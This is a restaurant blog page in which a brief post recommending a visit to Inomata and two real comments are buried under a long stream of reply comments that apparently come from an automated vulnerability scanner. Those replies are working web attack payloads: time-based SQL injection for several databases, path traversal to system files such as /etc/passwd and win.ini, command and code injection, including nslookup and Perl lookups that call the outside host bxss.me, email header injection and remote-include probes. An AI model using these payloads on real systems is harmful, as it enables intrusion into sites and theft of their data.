Hello all, just been in Japan for 3 weeks for work. Snuck in a visit to Inomata, every piece was amazing. Highly recommend the short trip out there. Easy to book on everyone’s favourite booking website as well.
Copyright © 2015 TokyoTableTrip All Rights Reserved.
10 Comments
>everyone’s favourite booking website
hahaha!
re: Leo Saito
OHHabL6z
re: Leo Saito
1*
re: Leo Saito
1*
re: Leo Saito
1*
re: Leo Saito
1*
re: Leo Saito
-1 OR 2+627-627-1=0+0+0+1
re: Leo Saito
-1 OR 3+627-627-1=0+0+0+1
re: Leo Saito
if(now()=sysdate(),sleep(15),0)
re: Leo Saito
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Leo Saito
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Leo Saito
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Leo Saito
-1; waitfor delay '0:0:15' --
re: Leo Saito
-1); waitfor delay '0:0:15' --
re: Leo Saito
1 waitfor delay '0:0:15' --
re: Leo Saito
ImUa4OYm'; waitfor delay '0:0:15' --
re: Leo Saito
9LBgOG1H
re: Leo Saito
1*
re: Leo Saito
1*
re: Leo Saito
1*
re: Leo Saito
1*
re: Leo Saito
-1 OR 2+429-429-1=0+0+0+1
re: Leo Saito
-1 OR 3+429-429-1=0+0+0+1
re: Leo Saito
-5 OR 615=(SELECT 615 FROM PG_SLEEP(15))--
re: Leo Saito
if(now()=sysdate(),sleep(15),0)
re: Leo Saito
-5) OR 366=(SELECT 366 FROM PG_SLEEP(15))--
re: Leo Saito
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Leo Saito
-1)) OR 57=(SELECT 57 FROM PG_SLEEP(15))--
re: Leo Saito
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Leo Saito
7H9XqJLA' OR 857=(SELECT 857 FROM PG_SLEEP(15))--
re: Leo Saito
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Leo Saito
O6JwYfxY') OR 323=(SELECT 323 FROM PG_SLEEP(15))--
re: Leo Saito
-1; waitfor delay '0:0:15' --
re: Leo Saito
dHgSGBWk')) OR 10=(SELECT 10 FROM PG_SLEEP(15))--
re: Leo Saito
-1); waitfor delay '0:0:15' --
re: Leo Saito
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Leo Saito
1 waitfor delay '0:0:15' --
re: Leo Saito
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Leo Saito
8aboxsIN'; waitfor delay '0:0:15' --
re: Leo Saito
'||(select 1 from (select pg_sleep(15))x)||'
re: Leo Saito
-5 OR 165=(SELECT 165 FROM PG_SLEEP(15))--
re: Leo Saito
''||(select 1 from (select pg_sleep(15))x)||''
re: Leo Saito
1'"
re: Leo Saito
@@Ik8vT
re: Leo Saito
-5) OR 413=(SELECT 413 FROM PG_SLEEP(15))--
re: Leo Saito
-1)) OR 680=(SELECT 680 FROM PG_SLEEP(15))--
re: Leo Saito
DfYTaXmD' OR 295=(SELECT 295 FROM PG_SLEEP(15))--
re: Leo Saito
NpfQETKc') OR 143=(SELECT 143 FROM PG_SLEEP(15))--
re: Leo Saito
5OEl7Csb')) OR 810=(SELECT 810 FROM PG_SLEEP(15))--
re: Leo Saito
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Leo Saito
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Leo Saito
'||(select 1 from (select pg_sleep(15))x)||'
re: Leo Saito
''||(select 1 from (select pg_sleep(15))x)||''
re: Leo Saito
1'"
re: Leo Saito
@@asGwt
re: Leo Saito
1ryVSXGSO
re: Leo Saito
response.write(9344937*9849577)
re: Leo Saito
'+response.write(9344937*9849577)+'
re: Leo Saito
"+response.write(9344937*9849577)+"
re: Leo Saito
../../../../../../../../../../../../../../etc/passwd
re: Leo Saito
../../../../../../../../../../../../../../windows/win.ini
re: Leo Saito
%0abcc:074625.67-14595.67.708b2.19990.2@bxss.me
re: Leo Saito
file:///etc/passwd
re: Leo Saito
to@example.com>%0d%0abcc:074625.67-14596.67.708b2.19990.2@bxss.me
re: Leo Saito
../../../../../../../../../../../../../../../proc/version
re: Leo Saito
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: Leo Saito
../../../../../../../../../../etc/passwd%00.jpg
re: Leo Saito
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: Leo Saito
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: Leo Saito
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: Leo Saito
/etc/passwd
re: Leo Saito
echo cinisc$()\ xhddce\nz^xyu||a #' &echo cinisc$()\ xhddce\nz^xyu||a #|" &echo cinisc$()\ xhddce\nz^xyu||a #
re: Leo Saito
%2fetc%2fpasswd
re: Leo Saito
&echo ccbhlv$()\ xibjsz\nz^xyu||a #' &echo ccbhlv$()\ xibjsz\nz^xyu||a #|" &echo ccbhlv$()\ xibjsz\nz^xyu||a #
re: Leo Saito
/.././.././.././.././.././.././.././../etc/./passwd%00
re: Leo Saito
|echo mrmasn$()\ eedklu\nz^xyu||a #' |echo mrmasn$()\ eedklu\nz^xyu||a #|" |echo mrmasn$()\ eedklu\nz^xyu||a #
re: Leo Saito
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: Leo Saito
(nslookup hitsshwahdhcb750bb.bxss.me||perl -e "gethostbyname('hitsshwahdhcb750bb.bxss.me')")
re: Leo Saito
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: Leo Saito
$(nslookup hitiebffaruoj1f603.bxss.me||perl -e "gethostbyname('hitiebffaruoj1f603.bxss.me')")
re: Leo Saito
<esi:include src="http://bxss.me/rpb.png"/>
re: Leo Saito
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: Leo Saito
&nslookup hitoevtqtvptkd2870.bxss.me&'\"`0&nslookup hitoevtqtvptkd2870.bxss.me&`'
re: Leo Saito
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: Leo Saito
&(nslookup hitvfzebkqrjd5c2fd.bxss.me||perl -e "gethostbyname('hitvfzebkqrjd5c2fd.bxss.me')")&'\"`0&(nslookup hitvfzebkqrjd5c2fd.bxss.me||perl -e "gethostbyname('hitvfzebkqrjd5c2fd.bxss.me')")&`'
re: Leo Saito
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: Leo Saito
|(nslookup hitiwoypxoqoe8aa4f.bxss.me||perl -e "gethostbyname('hitiwoypxoqoe8aa4f.bxss.me')")
re: Leo Saito
file:///etc/passwd
re: Leo Saito
${9999471+10000183}
re: Leo Saito
`(nslookup hitxyoqusgnrr45bc6.bxss.me||perl -e "gethostbyname('hitxyoqusgnrr45bc6.bxss.me')")`
re: Leo Saito
/\../\../\../\../\../\../\../etc/passwd
re: Leo Saito
;(nslookup hithvggqtbvzncdeae.bxss.me||perl -e "gethostbyname('hithvggqtbvzncdeae.bxss.me')")|(nslookup hithvggqtbvzncdeae.bxss.me||perl -e "gethostbyname('hithvggqtbvzncdeae.bxss.me')")&(nslookup hithvggqtbvzncdeae.bxss.me||perl -e "gethostbyname('hithvggqtbvzncdeae.bxss.me')")
re: Leo Saito
/WEB-INF/web.xml
re: Leo Saito
C:\WINDOWS\system32\drivers\etc\hosts
re: Leo Saito
../../../../../../../../../../windows/win.ini%00.jpg
re: Leo Saito
/../../../../../../../../../../boot.ini
re: Leo Saito
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: Leo Saito
..\..\..\..\..\..\..\..\windows\win.ini
re: Leo Saito
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: Leo Saito
)
re: Leo Saito
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: Leo Saito
!(()&&!|*|*|
re: Leo Saito
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: Leo Saito
^(#$!@#$)(()))******
re: Leo Saito
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: Leo Saito
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: Leo Saito
WEB-INF/web.xml
re: Leo Saito
WEB-INF\web.xml
re: Leo Saito
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: Leo Saito
'.gethostbyname(lc('hitid'.'qdodtgim803a3.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(98).chr(71).chr(112).chr(87).'
re: Leo Saito
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: Leo Saito
".gethostbyname(lc("hitxa"."iqqftpqtd83cc.bxss.me."))."A".chr(67).chr(hex("58")).chr(103).chr(86).chr(102).chr(79)."
re: Leo Saito
Http://bxss.me/t/fit.txt
re: Leo Saito
http://bxss.me/t/fit.txt%3F.jpg
re: Leo Saito
/etc/shells
re: Leo Saito
c:/windows/win.ini
re: Leo Saito
HttP://bxss.me/t/xss.html?%00
re: Leo Saito
bxss.me
re: Leo Saito
"+"A".concat(70-3).concat(22*4).concat(121).concat(78).concat(107).concat(67)+(require"socket"
Socket.gethostbyname("hitmk"+"fukciwly79366.bxss.me.")[3].to_s)+"
re: Leo Saito
bxss.me/t/xss.html?%00
re: Leo Saito
'+'A'.concat(70-3).concat(22*4).concat(101).concat(65).concat(117).concat(87)+(require'socket'
Socket.gethostbyname('hitem'+'rxpmered5abb0.bxss.me.')[3].to_s)+'
re: Leo Saito
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Leo Saito
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: Leo Saito
';print(md5(31337));$a='
re: Leo Saito
";print(md5(31337));$a="
re: Leo Saito
${@print(md5(31337))}
re: Leo Saito
'"
re: Leo Saito
${@print(md5(31337))}\
re: Leo Saito
<!--
re: Leo Saito
'.print(md5(31337)).'
re: Leo Saito
1
re: Leo Saito
1
re: Leo Saito
-1 OR 2+410-410-1=0+0+0+1 --
re: Leo Saito
-1 OR 3+410-410-1=0+0+0+1 --
re: Leo Saito
-1 OR 2+574-574-1=0+0+0+1
re: Leo Saito
-1 OR 3+574-574-1=0+0+0+1
re: Leo Saito
-1' OR 2+881-881-1=0+0+0+1 --
re: Leo Saito
-1' OR 3+881-881-1=0+0+0+1 --
re: Leo Saito
-1' OR 2+708-708-1=0+0+0+1 or '0CAOAk5F'='
re: Leo Saito
-1' OR 3+708-708-1=0+0+0+1 or '0CAOAk5F'='
re: Leo Saito
-1" OR 2+109-109-1=0+0+0+1 --
re: Leo Saito
-1" OR 3+109-109-1=0+0+0+1 --
re: Leo Saito
if(now()=sysdate(),sleep(15),0)
re: Leo Saito
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Leo Saito
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Leo Saito
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Leo Saito
-1; waitfor delay '0:0:15' --
re: Leo Saito
-1); waitfor delay '0:0:15' --
re: Leo Saito
1 waitfor delay '0:0:15' --
re: Leo Saito
munmahEF'; waitfor delay '0:0:15' --
re: Leo Saito
-5 OR 946=(SELECT 946 FROM PG_SLEEP(15))--
re: Leo Saito
-5) OR 716=(SELECT 716 FROM PG_SLEEP(15))--
re: Leo Saito
-1)) OR 510=(SELECT 510 FROM PG_SLEEP(15))--
re: Leo Saito
5UAY3yZj' OR 466=(SELECT 466 FROM PG_SLEEP(15))--
re: Leo Saito
zti1VO91') OR 706=(SELECT 706 FROM PG_SLEEP(15))--
re: Leo Saito
6rXcwXNU')) OR 437=(SELECT 437 FROM PG_SLEEP(15))--
re: Leo Saito
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Leo Saito
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Leo Saito
'||(select 1 from (select pg_sleep(15))x)||'
re: Leo Saito
''||(select 1 from (select pg_sleep(15))x)||''
re: Leo Saito
1'"
re: Leo Saito
@@dbqW0
Wow...inomata is now booked out until 31st December. Not so easy to book now.
re: guest
qQEHo8QA
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
-1 OR 2+949-949-1=0+0+0+1
re: guest
-1 OR 3+949-949-1=0+0+0+1
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
U8Y2htC1
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
-1 OR 2+204-204-1=0+0+0+1
re: guest
-1 OR 3+204-204-1=0+0+0+1
re: guest
-1); waitfor delay '0:0:15' --
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
1 waitfor delay '0:0:15' --
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
aTBvxbPt'; waitfor delay '0:0:15' --
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
-5 OR 939=(SELECT 939 FROM PG_SLEEP(15))--
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-5) OR 816=(SELECT 816 FROM PG_SLEEP(15))--
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1)) OR 46=(SELECT 46 FROM PG_SLEEP(15))--
re: guest
-1); waitfor delay '0:0:15' --
re: guest
vG9ECAni' OR 513=(SELECT 513 FROM PG_SLEEP(15))--
re: guest
1 waitfor delay '0:0:15' --
re: guest
e3hAiWu4') OR 295=(SELECT 295 FROM PG_SLEEP(15))--
re: guest
q7vGVGnd'; waitfor delay '0:0:15' --
re: guest
gTPhZWq2')) OR 794=(SELECT 794 FROM PG_SLEEP(15))--
re: guest
-5 OR 834=(SELECT 834 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
-5) OR 981=(SELECT 981 FROM PG_SLEEP(15))--
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
-1)) OR 410=(SELECT 410 FROM PG_SLEEP(15))--
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
MoNENG3P' OR 660=(SELECT 660 FROM PG_SLEEP(15))--
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@ZUjV0
re: guest
2YKDAxf4') OR 275=(SELECT 275 FROM PG_SLEEP(15))--
re: guest
mm1nhByV')) OR 166=(SELECT 166 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@dvm2s
re: guest
1FYCXDFiO
re: guest
response.write(9456931*9130322)
re: guest
'+response.write(9456931*9130322)+'
re: guest
%0abcc:074625.67-14588.67.50384.19990.2@bxss.me
re: guest
"+response.write(9456931*9130322)+"
re: guest
to@example.com>%0d%0abcc:074625.67-14589.67.50384.19990.2@bxss.me
re: guest
../../../../../../../../../../../../../../etc/passwd
re: guest
../../../../../../../../../../../../../../windows/win.ini
re: guest
<esi:include src="http://bxss.me/rpb.png"/>
re: guest
file:///etc/passwd
re: guest
../../../../../../../../../../../../../../../proc/version
re: guest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: guest
${10000278+9999854}
re: guest
../../../../../../../../../../etc/passwd%00.jpg
re: guest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: guest
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: guest
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: guest
/etc/passwd
re: guest
echo igoeue$()\ zrfmdx\nz^xyu||a #' &echo igoeue$()\ zrfmdx\nz^xyu||a #|" &echo igoeue$()\ zrfmdx\nz^xyu||a #
re: guest
%2fetc%2fpasswd
re: guest
&echo wgicnl$()\ szzege\nz^xyu||a #' &echo wgicnl$()\ szzege\nz^xyu||a #|" &echo wgicnl$()\ szzege\nz^xyu||a #
re: guest
/.././.././.././.././.././.././.././../etc/./passwd%00
re: guest
|echo hvgctu$()\ zwbqsi\nz^xyu||a #' |echo hvgctu$()\ zwbqsi\nz^xyu||a #|" |echo hvgctu$()\ zwbqsi\nz^xyu||a #
re: guest
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: guest
(nslookup hitieivstvjibfac14.bxss.me||perl -e "gethostbyname('hitieivstvjibfac14.bxss.me')")
re: guest
)
re: guest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: guest
$(nslookup hituwgptqpizg73d82.bxss.me||perl -e "gethostbyname('hituwgptqpizg73d82.bxss.me')")
re: guest
!(()&&!|*|*|
re: guest
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: guest
&nslookup hitsouxoxlejc7ba29.bxss.me&'\"`0&nslookup hitsouxoxlejc7ba29.bxss.me&`'
re: guest
^(#$!@#$)(()))******
re: guest
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: guest
&(nslookup hitpllfzvnroxa5b48.bxss.me||perl -e "gethostbyname('hitpllfzvnroxa5b48.bxss.me')")&'\"`0&(nslookup hitpllfzvnroxa5b48.bxss.me||perl -e "gethostbyname('hitpllfzvnroxa5b48.bxss.me')")&`'
re: guest
invalid../../../../../../../../../../etc/passwd/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././